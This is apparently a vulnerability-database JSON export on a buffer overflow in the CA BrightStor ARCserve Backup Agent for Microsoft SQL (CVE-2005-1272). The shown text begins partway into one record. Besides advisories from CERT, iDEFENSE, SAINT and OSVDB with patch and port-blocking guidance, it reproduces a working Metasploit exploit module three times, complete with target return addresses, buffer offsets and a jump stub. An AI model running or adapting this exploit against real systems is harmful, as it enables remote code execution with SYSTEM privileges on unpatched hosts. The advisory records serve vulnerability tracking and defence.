esp's\r\n\t\t\t\t\t['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp\r\n\t\t\t\t\t['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp\r\n\t\t\t\t\t['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret\r\n\t\t\t\t\t['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret\r\n\t\t\t\t\t['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret\r\n\t\t\t\t\t['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Aug 02 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(6070)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\t# The 'one line' request does not work against Windows 2003\r\n\t\t1.upto(5) { |i|\r\n\r\n\t\t\t# Flush some memory\r\n\t\t\tconnect\r\n\t\t\tbegin\r\n\t\t\t\tsock.put(\"\\xff\" * 0x12000)\r\n\t\t\t\tsock.get_once\r\n\t\t\trescue\r\n\t\t\tend\r\n\t\t\tdisconnect\r\n\r\n\r\n\t\t\t# 3288 bytes max\r\n\t\t\t# 696 == good data (1228 bytes contiguous) @ 0293f5e0\r\n\t\t\t# 3168 == return address\r\n\t\t\t# 3172 == esp @ 0293ff8c (2476 from good data)\r\n\r\n\t\t\tbuf = rand_text_english(3288, payload_badchars)\r\n\t\t\tbuf[ 696, payload.encoded.length ] = payload.encoded\r\n\t\t\tbuf[3168, 4] = [target.ret].pack('V') # jmp esp\r\n\t\t\tbuf[3172, 5] = \"\\xe9\\x4f\\xf6\\xff\\xff\" # jmp -2476\r\n\r\n\t\t\tconnect\r\n\t\t\tbegin\r\n\t\t\t\tsock.put(buf)\r\n\t\t\t\tsock.get_once\r\n\t\t\trescue\r\n\t\t\tend\r\n\r\n\t\t\thandler\r\n\t\t\tdisconnect\r\n\t\t}\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16403/"}], "saint": [{"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 12/20/2005 \nCVE: [CVE-2005-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272>) \nBID: [14453](<http://www.securityfocus.com/bid/14453>) \nOSVDB: [18501](<http://www.osvdb.org/18501>) \n\n\n### Background\n\n[BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) is a backup and recovery solution for multiple platforms. \n\n### Problem\n\nA buffer overflow in the backup agent for Microsoft SQL Server allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [patch](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>) for vulnerability ID 33239. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287 ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287\n>) \n\n\n### Limitations\n\nBrightStor ARCserve Backup 11.1. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2005-12-20T00:00:00", "published": "2005-12-20T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_mssql_agent", "id": "SAINT:7AACFCE7244CB5A12AA6DCF88C28DB9E", "type": "saint", "title": "BrightStor ARCserve Backup agent for MS-SQL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "description": "Added: 12/20/2005 \nCVE: [CVE-2005-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272>) \nBID: [14453](<http://www.securityfocus.com/bid/14453>) \nOSVDB: [18501](<http://www.osvdb.org/18501>) \n\n\n### Background\n\n[BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) is a backup and recovery solution for multiple platforms. \n\n### Problem\n\nA buffer overflow in the backup agent for Microsoft SQL Server allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [patch](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>) for vulnerability ID 33239. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287 ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287\n>) \n\n\n### Limitations\n\nBrightStor ARCserve Backup 11.1. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2005-12-20T00:00:00", "published": "2005-12-20T00:00:00", "id": "SAINT:C19DEFBDF9159625288D16104849FCAC", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_mssql_agent", "type": "saint", "title": "BrightStor ARCserve Backup agent for MS-SQL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:21", "bulletinFamily": "exploit", "description": "Added: 12/20/2005 \nCVE: [CVE-2005-1272](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272>) \nBID: [14453](<http://www.securityfocus.com/bid/14453>) \nOSVDB: [18501](<http://www.osvdb.org/18501>) \n\n\n### Background\n\n[BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) is a backup and recovery solution for multiple platforms. \n\n### Problem\n\nA buffer overflow in the backup agent for Microsoft SQL Server allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [patch](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>) for vulnerability ID 33239. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287 ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=287\n>) \n\n\n### Limitations\n\nBrightStor ARCserve Backup 11.1. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2005-12-20T00:00:00", "published": "2005-12-20T00:00:00", "id": "SAINT:6A1974057004A5AC78290EDEE636728C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_mssql_agent", "title": "BrightStor ARCserve Backup agent for MS-SQL buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2018-12-25T20:19:33", "bulletinFamily": "info", "description": "### Overview \n\nSeveral Computer Associates BrightStor ARCserve Backup Agents contain a buffer overflow, which may allow a remote attacker to execute arbitrary code.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup is a cross-platform backup and recovery application. Backup Agents are available to provide backup support for additional applications, such as Microsoft SQL Server, Oracle, SAP R/3, and Microsoft Exchange.\n\nThe ARCserve Backup Agents fail to properly validate input, which creates a buffer overflow vulnerability. By default, the Backup Agents listen on 6070/tcp. \n \nExploit code for this vulnerability is publicly available. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code on a system running the vulnerable Backup Agent. \n \n--- \n \n### Solution \n\n**Upgrade or patch** \nUpgrade or install patches, as recommended by the [Computer Associates vulnerability 33239 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>). \n \n--- \n \n \n**Restrict Access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Backup Agents (typically 6070/tcp). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n279774\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Computer Associates \n\nUpdated: August 04, 2005 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the [Computer Associates vulnerability 33239 description](<http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23279774 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239>\n * [http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70767&startsearch=1](<http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70767&startsearch=1>)\n * [http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70769&startsearch=1](<http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70769&startsearch=1>)\n * [http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70770&startsearch=1](<http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70770&startsearch=1>)\n * [http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70774&startsearch=1](<http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70774&startsearch=1>)\n * [http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70773&startsearch=1](<http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO70773&startsearch=1>)\n * <http://idefense.com/application/poi/display?id=287>\n * <http://www.securitytracker.com/alerts/2005/Aug/1014611.html>\n * <http://secunia.com/advisories/16316/>\n * <http://osvdb.org/displayvuln.php?osvdb_id=18501>\n * <http://www.securityfocus.com/bid/14453>\n\n### Credit\n\nThis vulnerability was reported by Computer Associates, who in turn thank iDEFENSE for reporting the vulnerability. \n\nThis document was written by Will Dormann. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1272](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1272>) \n---|--- \n**Severity Metric:****** | 25.99 \n**Date Public:** | 2005-08-02 \n**Date First Published:** | 2005-08-03 \n**Date Last Updated: ** | 2007-01-12 21:42 UTC \n**Document Revision: ** | 13 \n", "modified": "2007-01-12T21:42:00", "published": "2005-08-03T00:00:00", "id": "VU:279774", "href": "https://www.kb.cert.org/vuls/id/279774", "type": "cert", "title": "Computer Associates BrightStor ARCserve Backup Agents vulnerable to buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-02-12T04:52:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net.", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T04:57:41", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/SQL_AGENT", "href": "", "type": "metasploit", "title": "CA BrightStor Agent for Microsoft SQL Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the CA BrightStor\n Agent for Microsoft SQL Server. This vulnerability was\n discovered by cybertronic[at]gmx.net.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-1272'],\n [ 'OSVDB', '18501' ],\n [ 'BID', '14453'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],\n [ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n # This exploit requires a jmp esp for return\n ['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp\n ['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret\n ['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret\n\n # Generic jmp esp's\n ['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp\n ['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp\n ['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret\n ['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret\n ['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret\n ['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret\n ],\n 'DisclosureDate' => 'Aug 02 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6070)\n ])\n end\n\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n # The 'one line' request does not work against Windows 2003\n 1.upto(5) { |i|\n\n # Flush some memory\n connect\n begin\n sock.put(\"\\xff\" * 0x12000)\n sock.get_once\n rescue\n end\n disconnect\n\n\n # 3288 bytes max\n # 696 == good data (1228 bytes contiguous) @ 0293f5e0\n # 3168 == return address\n # 3172 == esp @ 0293ff8c (2476 from good data)\n\n buf = rand_text_english(3288, payload_badchars)\n buf[ 696, payload.encoded.length ] = payload.encoded\n buf[3168, 4] = [target.ret].pack('V') # jmp esp\n buf[3172, 5] = \"\\xe9\\x4f\\xf6\\xff\\xff\" # jmp -2476\n\n connect\n begin\n sock.put(buf)\n sock.get_once\n rescue\n end\n\n handler\n disconnect\n }\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/brightstor/sql_agent.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "description": "CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow\r\n\r\niDEFENSE Security Advisory 08.02.05\r\nwww.idefense.com/application/poi/display?id=287&type=vulnerabilities\r\nAugust 2, 2005\r\n\r\nI. BACKGROUND\r\n\r\nBrightStor ARCserve Backup for Windows delivers backup and restore\r\nprotection for all Windows server systems as well as Windows, Linux,\r\nMac OS X and UNIX client environments.\r\n\r\nhttp://www3.ca.com/Solutions/ProductFamily.asp?ID=115\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow in the Backup Agent for\r\nMicrosoft SQL Server within Computer Associates' BrightStor ARCserve \r\nBackup Agent for SQL allows an attacker to execute arbitrary code with\r\nSYSTEM privileges.\r\n\r\nBrightStor ARCserve Backup Agent for Microsoft SQL Server is a component\r\nof the BrightStor ARCserve Backup system for handling backups of \r\nMicrosoft SQL server data. When a string with a length over 3168 bytes,\r\nis sent to the listening port, 6070 by default, a stack based buffer \r\noverflow occurs.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation allows remote attackers to execute arbitrary\r\ncode with SYSTEM level privileges. This allows for complete system\r\ncompromise including the installation or removal of software and access\r\nto any file on the system.\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has confirmed the existence of this vulnerability in Computer\r\nAssociates BrightStor ARCserve Backup Agent for Microsoft SQL Server\r\nversion 11.0. It is suspected that all versions are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nRestrict remote access at the network boundary, unless remote parties\r\nrequire service. Access to the affected host should be filtered at the \r\nnetwork boundary if global accessibility is not required. Restricting \r\naccess to only trusted hosts and networks may reduce the likelihood of \r\nexploitation.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nA vendor advisory for this vulnerability can be found at:\r\n\r\n http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-1272 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n04/25/2005 Initial vendor notification\r\n04/25/2005 Initial vendor response\r\n08/02/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2005-08-03T00:00:00", "published": "2005-08-03T00:00:00", "id": "SECURITYVULNS:DOC:9373", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9373", "title": "[Full-disclosure] iDEFENSE Security Advisory 08.02.05: CA BrightStor ARCserve Backup Agent for MS SQL Server Buffer Overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote stack-based buffer overflow exists in Brightstor Arcserve. The agent software fails to validate user-supplied input resulting in a long string overflow. With a specially crafted request of 3168 bytes to port 6070, an attacker can execute arbitrary code with System privilege resulting in a loss of confidentiality and integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released patches to address this vulnerability:\nFor ARCserve 11.1 apply fix QO70767.\nFor ARCserve 11 apply fix QO70769.\nFor ARCserve 9.01 apply fix QO70770.\nFor Enterprise 10.5 apply fix QO70774.\nFor Enterprise 10 apply fix QO70773.\n## Short Description\nA remote stack-based buffer overflow exists in Brightstor Arcserve. The agent software fails to validate user-supplied input resulting in a long string overflow. With a specially crafted request of 3168 bytes to port 6070, an attacker can execute arbitrary code with System privilege resulting in a loss of confidentiality and integrity.\n## References:\n[Vendor Specific Advisory URL](http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239)\nSecurity Tracker: 1014611\n[Secunia Advisory ID:16316](https://secuniaresearch.flexerasoftware.com/advisories/16316/)\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities\n[Nessus Plugin ID:19387](https://vulners.com/search?query=pluginID:19387)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0071.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0033.html\nKeyword: TCP port 6070 \nGeneric Exploit URL: http://metasploit.org/projects/Framework/modules/exploits/cabrightstor_sqlagent.pm\n[CVE-2005-1272](https://vulners.com/cve/CVE-2005-1272)\nBugtraq ID: 14453\n", "modified": "2005-08-02T05:17:53", "published": "2005-08-02T05:17:53", "href": "https://vulners.com/osvdb/OSVDB:18501", "id": "OSVDB:18501", "type": "osvdb", "title": "CA BrightStor ARCserve Backup Agent for Windows Long String Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:28", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83109/CA-BrightStor-Agent-for-Microsoft-SQL-Overflow.html", "id": "PACKETSTORM:83109", "type": "packetstorm", "title": "CA BrightStor Agent for Microsoft SQL Overflow", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the CA BrightStor \nAgent for Microsoft SQL Server. This vulnerability was \ndiscovered by cybertronic[at]gmx.net. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-1272'], \n[ 'OSVDB', '18501' ], \n[ 'BID', '14453'], \n[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'], \n[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'], \n \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n# This exploit requires a jmp esp for return \n['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp \n['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret \n['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret \n \n# Generic jmp esp's \n['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp \n['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp \n['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret \n['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret \n['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret \n['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret \n], \n'DisclosureDate' => 'Aug 02 2005', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(6070) \n], self.class) \nend \n \n \n \n \ndef exploit \n \nprint_status(\"Trying target #{target.name}...\") \n \n# The 'one line' request does not work against Windows 2003 \n1.upto(5) { |i| \n \n# Flush some memory \nconnect \nbegin \nsock.put(\"\\xff\" * 0x12000) \nsock.get_once \nrescue \nend \ndisconnect \n \n \n# 3288 bytes max \n# 696 == good data (1228 bytes contiguous) @ 0293f5e0 \n# 3168 == return address \n# 3172 == esp @ 0293ff8c (2476 from good data) \n \nbuf = rand_text_english(3288, payload_badchars) \nbuf[ 696, payload.encoded.length ] = payload.encoded \nbuf[3168, 4] = [target.ret].pack('V') # jmp esp \nbuf[3172, 5] = \"\\xe9\\x4f\\xf6\\xff\\xff\" # jmp -2476 \n \nconnect \nbegin \nsock.put(buf) \nsock.get_once \nrescue \nend \nhandler \ndisconnect \n} \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83109/sql_agent.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}